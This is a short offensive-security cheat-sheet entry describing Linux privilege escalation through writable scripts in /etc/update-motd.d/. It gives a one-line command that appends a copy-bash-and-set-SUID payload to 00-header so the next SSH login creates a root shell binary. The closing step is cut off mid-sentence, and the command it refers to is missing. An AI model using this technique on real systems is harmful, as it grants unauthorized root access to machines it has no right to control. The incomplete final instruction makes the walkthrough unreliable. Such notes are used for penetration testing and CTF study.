Update-Motd Privilege Escalation
Last modified: 2023-02-17
/etc/update-motd.d/ is used to generate the dynamic message of the day (MOTD) that is displayed to users when they log in to the system. If we can modify files listed in the directory, we can inject malicious script to escalate privileges.
ls -al /etc/update-motd.d/
If we have permission to modify files in this directory, we can inject arbitrary code and execute when logging in.
Run the following code to copy bash binary and give
suid to this file.
<username> with your current user name.
echo "cp /bin/bash /home/<username>/bash && chmod u+s /home/<username>/bash" >> /etc/update-motd.d/00-header
After that, log out and log in again with SSH. The above script should be executed.
Now execute the following command under
We should get a root shell.